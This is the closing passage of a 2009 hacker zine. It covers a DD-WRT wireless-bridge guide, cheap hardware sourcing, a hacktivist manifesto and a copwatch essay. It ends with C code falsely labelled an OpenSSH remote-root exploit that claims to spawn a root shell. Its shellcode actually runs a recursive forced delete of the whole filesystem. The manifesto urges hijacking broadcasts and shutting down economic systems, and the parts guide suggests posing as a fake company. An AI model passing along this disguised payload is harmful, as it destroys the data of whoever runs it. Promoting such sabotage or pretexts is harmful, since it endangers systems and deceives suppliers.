d. Gateway: 192.168.2.1
i) This was the IP address of the broadcasting network we were trying
to bridge.
2) In our case it was our Guest network that the omni was broadcasting.
d. DNS: 192.168.2.1
e. Assign WAN Port To Switch: Checked
f. DHCP Server: Disable
g. Click "Save Settings".
h. Click "Apply" — triggers reboot.
5. Give your computer a static IP address within the 192.168.2.X subnet.
a. The gateway is the IP address of the bridge: 192.168.2.2.
b. Log back on to 192.168.2.2.
5. Go to the Security Tab > Firewall
a. SPI Firewall: Disable
b. Click "Save Settings"
6. Go to the Wireless Tab > Basic Settings
a. Wireless Mode: Client Bridge
b. Wireless Network Mode: Match your primary router.
c. Wireless Network Name (SSID): Match your primary router. (case matters!)
d. Wireless Channel is not relevant in Client Bridge mode.
e. Click "Save Settings".
The router will now be in Client Bridge mode.
7. Wireless Tab > Wireless Security
a. (Go to this link http://www.dd-wrt.com/wiki/index.php/Wireless_Bridge
for more info).
i) We don't use a WEP.
8. Go to the Status Tab > Wireless
a. Click Site Survey and join the appropriate wireless network.
i) The Access Point table should show the MAC address of your Primary
Router, along with signal strength.
ii) SSID Broadcast MUST be enabled on the routing your are sucking
signal from.
9. Go to the Administration Tab > Backup
a) Click "Backup."
We ended up buying the exact same equipment above and attaching it to the AP.
The only difference is that we purchased an omni antenna 2.4GHz 15dBi instead of
a directional. The omni was put 4 feet above the directional antenna on the
same pole.
SET UP ACCESS POINT
1. Set your computers IP address to DHCP.
2. Log onto the other Linksys WRT54GL that was not used as the bridge.
a. 192.168.1.1 assuming it's new or it's been reset.
b. User: admin pass: admin.
3. Go to the Setup Tab > Basic Setup
a. Internet setup: Automatic Configuration – DHCP
b. Network setup
i) Router IP: 192.168.3.1
(1) This was done so as not to conflict with the IP addresses that
were given out at via DHCP on 192.168.2.1
ii) Network address
(1) DHCP Server: Enable.
iii) Time Setting: (Which ever time zone you are in).
c. Save settings.
4. Release and renew the IP address of your computer.
5. Go to the Setup Tab > Advanced Routing.
a. Operating Mode: Gateway.
6. Go to the Wireless Tab > Basic Wireless Settings
a. Wireless Network Mode: Mixed.
b. Wireless Network Name (SSID): (your ssid here)
c. Wireless Channel: 1
i) Channels 1, 6 and 11 are the best and non-overlapping.
ii) We choose 1 because 6 and 11 were already in use and we did not want
interference.
d. Wireless SSID Broadcast: Enable.
e. Save settings.
7. Go to the Status Tab > Router
a. The AP's IP Address shows that it's getting a DHCP'd IP from the network
we're sucking from: 192.168.2.1.
b. The Gateway and DNS are from 192.168.2.1.
8. Go to the Status Tab > Local Network
a. Shows the 192.168.3.1 network and the DHCP server info.
9. Status Tab > Wireless
a. Shows SSID, mode and channel info.
Now you're ready to suck signal!
################################################################################
# 7. Hardware Hacking by Frenzy #
################################################################################
Hardware hacking, another tool in the tool box, but essential for those of us
who want to learn the system. Hardware hacking and circuit building can be very
rewarding with not much effort. With a resent surge in interest in "hobby
electronics" there are LOTS of resources out there. There are also people trying
to make a buck, and looking to make you spend more than you need to. This
article seeks to display some of the ways I have found to get parts for free or
cheap!
The first thing a hardware hacker needs is tools starting with a good soldering
iron. For this, it's best to get one that is a of good quality and a fine tip. A
fat tip will just get in the way. My first soldering iron was a radio shack one,
it worked, but once I upgraded to a xytronics one, my life got easier. You can
pick up either a weller or xytronics iron, the xytronics ones are cheaper, a
good one is under 30 bucks. The best way I have found to get this is on line. Do
some research. Along with an iron you'll need a multimeter, wire strippers, wire
cutters and a lead cutter to trim components. Some way to remove solder helps as
well, like a "solder sucker" or de-soldering wick. Once you have your tools
together it's time to go dumpster diving.
Dumpster diving is a good way to find lots of various components. I have found
enough random capacitors and LEDs on spare circuit boards do projects without
spending a dime. Removing parts from old circuit boards is also a good way to
practice soldering. I dumpster behind the local radio shack and trolled around
the local college campus. Bring a screwdriver with you so you can open things on
the road and leave behind the cases taking with you the precious goodies! I use
almost everything from the wire, to speakers and resistors. If you are good with
a heat gun, you can use that to do your de-soldering and have all the parts fall
right out!
The next way to get cheap parts is Ebay. Once you know what you need, go on Ebay
and search for it. A lot of the sellers are direct from china (you get the parts
from china anyway you might as well get them direct), so they are a lot cheaper,
and sellers like to throw in goodies. I ordered 100 LEDs and got 100 resistors
for free.
Requesting samples can work with a few companies. I have successfully requested
samples from Texas Instruments and Pactec enclosures. The key to getting samples
is how believable you are. Make up a fake company, and try it out. It's nice to
get free things sent to your door. I'm sure if you were really advanced, you
could never by parts again. For more about this go to
http://www.ladyada.net/library/procure/index.html.
Lastly, ask your friends. You may have friends who tried out the hardware
hacking thing and it wasn't for them. Parts have not changed much in the past 20
years, so many will still work. If you have lots of friends into hardware, you
can go to a large distributor like DigiKey and get an order of parts.
HAPPY HARDWARE HACKING!
Here are a list of resources for those getting into hardware hacking:
Make: Magazine: www.makezine.com
Ladyada: http://www.ladyada.net/
Instructables: www.instructables.com
################################################################################
# 8. On Using Technology to Dismantle the Industrial Beast by Anonymous #
################################################################################
Our civilization is so flooded with technology that it is difficult to imagine a
world without it. We have machines to wake us up and make us coffee in the
morning, machines to keep us informed and entertained, and machines to clean and
dry our clothes. Many people who work exclusively with computers and technology
cannot accomplish these simple tasks without the use of machines.
Yet human beings on this planet have been able to survive in harmony for
hundreds of thousands of years without many of these 'modern advances'. The
majority of these domestications have only happened in the past few hundred
years with the Industrial Revolution. Now, not by coincidence, we are facing our
largest problems ever: with the resources and space available, will we really be
able to sustain this great Industrial Beast we've built without killing
ourselves? And if we can, would it really be worth it?
The arguments for technology and industrialism usually suggest that these
"advances" make life easier, work more efficient, and more enjoyable. As far as
survival is concerned, we only really need a few basic needs, which in our
natural environment are relatively easy to procure as hunter / gatherers. Now
this is only possible in areas outside of cities where the land is not "owned'
and the food is not under lock and key. In these places, it becomes necessary to
participate in the Economy by working at one of their jobs, the majority of
which are not productive for survival purposes, but are artificially necessary
to support the Industrial Beast. This ends up creating more work than is
actually necessary for our survival, all for the Corporate Executives and
Stockholders who profit from our labor. Additionally, our reliance on technology
can make it difficult for some to prepare food, make or repair clothing, or even
keep entertained and stimulated without the aid of technology.
Technology and Industrialism are not necessary for our survival, and in fact,
are being used against humanity and the planet as a whole by those who are
currently in control of it: the Rich Ruling Classes.
At one point it was possible to disappear easily and live Off The Grid. Now,
with the help of modern technological advances, the ruling classes' dream can be
fully realized: a world where everyone is given numbers and are carefully
tracked, monitored, regimented. Virtually every aspect of our lives are now
under surveillance through integrated camera systems, GPS locating devices, RFID
tags, social security numbers & bank accounts, phone / email taps, and even
urine tests. On suspicion of wrongdoing, they can detain us and deny us our
rights, calling us terrorists. Yet every day we are the ones who are Terrorized
by their Technological Police State, exceeding Orwell's wildest nightmares.
Technology is also being used to keep us passive, domesticated, and brainwashed
by the machine's propaganda. A few corporations control most of the television
stations, radio stations, newspapers and other media. They use their monopoly of
the media to broadcast the positions of the State, favorable to Corporate and
Government interests. They keep us passive and sedated with mindless
entertainment, video games, reality TV shows, making us confused, distracted,
numb, and 'comfortable'. Now much of our communication with other human beings
has been reduced to instant messages and blogs. We have become their zombies who
cannot think or accomplish this for ourselves or survive on our own, to a point
where we depend on the Industrial Beast and cannot live without it - just where
they want us.
In addition to keeping us in slavery, the Machine has also held captive and is
endangering the planet's stability. There is not much land and space that has
not been encroached by the Industrial Beast. Entire species have either been
wiped out, domesticated, or controlled for food. Humans are the only species
that believes the entire planet belongs to it, and can be terraformed for
humanity. It does not take much research to see how badly we have damages the
earth's natural balance, covering the earth with parking lots, power plants,
Starbucks and concrete jungles. Exhausting the earth's natural resources,
climate instability, endangered species, even the air's breatheability and the
water's drinkability, all of which are a direct result of the Industrial Beast
and the expansion of Capitalism.
In summary, the madness of the machine as controlled by the Rich Ruling Classes
is keeping us in chains. All this time we have been seduced and bamboozled by
their promised life of luxury and freedom through their technology, and all we
have is a world spinning towards extinction so that a few corporate executives
can profit. We are facing a global crisis, and the problem lies deeper than
which political party is cracking the whip. No amount of reform or institutional
change through their political process can address the roots of the problem. No
'newer, better, greener' technology can solve the problems technology itself has
created. It is for this reason we must reverse the direction of the machine -
from controlling and enslaving to freeing and liberating - and use technology to
destroy it's master, the Industrial Beast.
The Role of the Hacker
The role of the hacker is to exploit the system's internal contradictions and
turn them against itself - to stop the Ruling Classes from using technology to
control us, and instead return technology back to the people to fight for
freedom, justice, and equality. We must crack, break, and subvert the Machine
and reverse it's direction.
The ruling classes know that whoever controls technology has power, which is why
they try to limit access to computers and technology. It is not a secret that
those who have access to technology and training are generally limited to the
middle and upper classes, ensuring that only those who are comfortable with the
status quo hold all the keys. They do not want the unwashed masses to have the
same access to manipulate technology; rather, they seek to manipulate the
unwashed masses _by_ technology.
It is ironic that hackers, hacking an unusual amount of power over technology
and possessing the ability to shut down the machine, generally belong to the
privileged classes and may have little interest in changing the status quo and
will likely be satisfied by being quietly filed into one of the many computer
jobs available in the Establishment. This is not always the case, as hackers are
often prodigies who live unconventional lives and whose values may reflect a
deeper perspective on society.
As they grow older, aspiring hackers are forced to decide what they want to do
with their skills and are generally pulled into three broad directions:
(1) They sell out to Corporations security firms, or Government and try to
make a buck by giving away all the secrets and tricks of the trade as a
"security consultant". These "white hats", or "sellouts", whore their skills
to the Establishment and help protect the infrastructure of the Industrial
Beast, whether they consciously realize it or not.
(2) Other hackers have different motivations. They are scammers, defrauders,
graffiti artists, also trying to make money or a name for themselves, or are
simply just hobbyist hackers. This is a broad group, but are generally
apolitical and have no loyalties or ideologies and act as a rogue. Although
they are popularly called "black hat" or "grey hat", they often share the
same motivations as white hats (money and fame), but use different means to
accomplish this.
(3) The third category are Hacktivists who take a principled stand and use
their skills not to benefit themselves but to support social justice
struggles, fighting for freedom, equality, and social justice, and a return
back to a state of harmony with the earth.
Generally speaking, whichever category one ends up in is mainly dependent on
which socio-economic class you belong to or support. However, considering the
planetary crisis we face caused by the Industrial Beast, lines are being drawn
and it is becoming increasingly necessary to decide which side you are on.
It is the Duty of Hackers to use their skills and privilege to use technology
against the Industrial Beast. It is up to us hackers to realize who the real
enemy is - and to point our technological guns in the right direction.
Using Technology to Subvert the Industrial Beast
Because the ruling classes try to restrict access and training to technology to
the privileged classes, simply making these resources available can be a
revolutionary act. Community centers can be set up with free internet access to
train people how to use computers, and also to build and repair computers from
spare or discarded parts to be distributed free of charge.
In addition, our duty is to get everyone we know to stop supporting the Beast in
any way. Don't make it easy for them to track you, or hold any kind of power
over you. If all of us were able to completely refuse to participate in their
Numbers Racket, they would be completely powerless. Remember, although they have
tricked many people into thinking it is impossible to survive without them, we
still hold all the real power because they depend on us for all their manual
labor and work, so if we teach ourselves how to survive on our own and refuse to
participate, they are doomed.
Some ways to Unplug and live Off the Grid:
* refuse to use bank accounts, credit cards, checks, loans
* refuse to pay taxes; work under the table if you can
* refuse to drive a car, ride a bike instead
* refuse to purchase goods from their stores or watch TV
* learn to grow your own food, clean your own water, make and fix your own
clothes, and don't be afraid to live in the wild
* _self-sufficiency is the answer_
Become self-sufficient so you can survive on your own without their 'help' cuts
off all the power they have over you. We can build our own communities and live
free on our own (i.e Temporary Autonomous Zone). But until everyone else is free
and stops supporting the Machine, it will continue eating up everything in it's
path ('manifest destiny'). So 'passive resistance' may not be enough to stop it.
Fortunately, it does not take much for a hacker to deal crippling blows against
the Machinery of Capitalism. Everyone, especially hackers, knows there are
weaknesses in every system, everything is fallible, and that the more complex a
system is, the more places there are to stick the dynamite. These days,
everything is interconnected through networks and databases. The Industrial
Beast is not some faceless monolith; there are specific corporations,
governments and individuals responsible for the world's wars and ecological
disasters.
It is not hard to imagine some of the ways we can throw a monkey wrench into the
machine. Some ideas:
* Hijack radio, TV, and websites to broadcast messages encouraging a
revolution, an end to capitalist wars, and shutting down prisons
* Shut down economic systems, creating incidents to stir fear
* Expose vulnerabilities in election systems to reveal their fraudulent
nature, and to encourage Direct Action
* Expose internal communications of corrupt institutions and state secrets
* Shut 'em down!
From whichever angle you attack the Beast, it must also be in coordination with
on-the-ground protests, marches, and educational campaigns so the media cannot
twist it around and call us terrorists. The people must understand and agree
with the cause.
In addition, alternatives to Industrialism must be made available, such as
self-sufficient communes, worker collectives, etc - to function once the
Industrial Beast collapses. These must be created through direct democracy,
collective decision making, autonomy and non-hierarchical processes, embracing a
gift-economy instead of a privatized competitive market, or else our new society
may fall victim to the same mistakes as that of the Beast.
As the global crisis intensifies over the next few years, the major
industrialized nations will soon be 'running on empty' and may resort to
drastic, unpredictable actions to stay in power. It's no secret that the Titanic
is sinking. The time to Abandon Ship is now.
Run, Comrades, the Old World is Behind You!
################################################################################
# 9. Oscar Grant and Copwatch 2.0 by Flatline #
################################################################################
On January 1st 2009, Oscar Grant was murdered in cold blood by members of the
bay area rapid transit police dept. Oscar Grant is not the first person to be
the victim of a police murder, and he will certainly not be the last. But the
case of Oscar Grant is unique, it is different than any other police murder yet
and it heralds a new future. The murder of Oscar grant is different because it
was witnessed by millions of people.
Oscar Grant was shot in the back by johannes mehserle, but Grant was not alone,
many people were around him and at least two of them had cell phone cameras and
taped the whole thing, and then hours later, it was uploaded to you tube, for
all the world to see. These people were (probably) inadvertently participating
in copwatch. Copwatch is the idea that to keep police honest and to keep the
citizenry safe, people must follow the police, go where they go, and document
what they do. Preferably with video evidence. Now I am the first to say that
terms like 'web 2.0' and 'social networks' are just marketing fluff; but after
witnessing the aftermath of this particular police murder, I feel that You Tube,
camera phones and social networks (basically summed up as the ability to create,
publish and share media nearly instantly) can herald in a wonderful new era of
transparency for law enforcement and a wonderful new age for copwatch.
The main problem with Copwatch perviously (from my experience) was that the cops
would always take your video camera or destroy the tape once they saw you
recording them. You Tube and cellphone networks alleviate this problem by
allowing you to pretty much instantly send a copy of the video to at least one
trusted friend if not more. That friend can then instantly upload the video and
spread it around far and wide. Information dissemination on this wide a scale
has never before been possible.
I postulate that without the power of services like YouTube and video messaging,
mehserly would have never been punished for the killing of Grant, protests and
riots never would have happened because the information never would have spread
so far and wide and people would not have been so enraged without witnessing
this atrocity first hand. The pressure from the riots, protests, first hand
video and the sheer number of people that witnessed this act was what forced
BART's hand into prosecuting Mehserle. If not for that Oscar Grant would be
just another statistic.
A new model of CopWatch is needed, one which utilizes the ability to instantly
create and distribute media to its fullest potential. These days video
recording phones can be had for cheap, possibly even free, and you tube is
obviously a free service. One could even start a copwatch clearing house for
people to upload all of there copwatch videos. If we watch the cops all the
time, and make them know that they are going to be held responsible for there
actions in the eyes of the public, we may be able to prevent another police
murder from happening ever again.
################################################################################
anti-(c)opyright 2009
you are encouraged to reuse, reword, and reprint everthing in this zine as you
please. this includes: printing your own copies to distribute to friends and
family, copying and pasting bits of text in your own works, mirroring electronic
copies to websites and file sharing services, or anything else you can think of-
!! without asking permission or apologizing !!
Electronic copies of the zine are available free online at the Hack Bloc website
(www.hackbloc.org/zine/). There are two versions of the zine: a full color
graphical PDF version wich is best for printing and also includes all sorts of
extras, as well as a raw TXT version for a more readable and compatible format.
Having the zine in your hands is still the best way to experience our zine. If
you can't print your own (double sided 8.5x11) than you can order copies of this
issue and most back issues from our friends at Microcosm Publishing
(www.microcosmpublishing.com) who are based out of Bloomington, IN. We are
always seeking translators to translate HackThisZine into other languages, if
your interested in working with us to translate this issue please send us an
E-mail to us at: Staff@HackBloc.org.
################################################################################
HACK THIS ZINE SUMMER 2009 HACK THE GIBSON
(aka the "Why is this joke still funny" issue)
zine staff hackbloc staff
---------- --------------
Flatline Evoltech
Nomenumbra Doll
Evoltech Sally
Kuroishi Ringo
alxCIAda Frenzy
Impact HexBomber
Sally alxCIAda
Frenzy Impact
Flatline
get involved! staff@hackbloc.org
BAY AREA: http://www.hackbloc.org
OLYMPIA: http://www.olyhackbloc.org
AND MANY MORE CLANDESTINE COLLECTIVES
COMING SOON TO A CITY NEAR YOU!
################################################################################
// AND NOW !! OPENSSH 0DAY REMOTE ROOT PROOF OF CONCEPT CODE !! KEEP PRIVATE !!
#include <unistd.h>
char code[] = "\x6a\x0b\x58\x31\xf6\x56\x6a\x2f\x89\xe7\x56\x66\x68\x2d\x66"
"\x89\xe2\x56\x66\x68\x2d\x72\x89\xe1\x56\x68\x2f\x2f\x72\x6d"
"\x68\x2f\x62\x69\x6e\x89\xe3\x56\x57\x52\x51\x53\x89\xe1\x31"
"\xd2\xcd\x80"; // setuid(0) /bin/sh I swear!
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}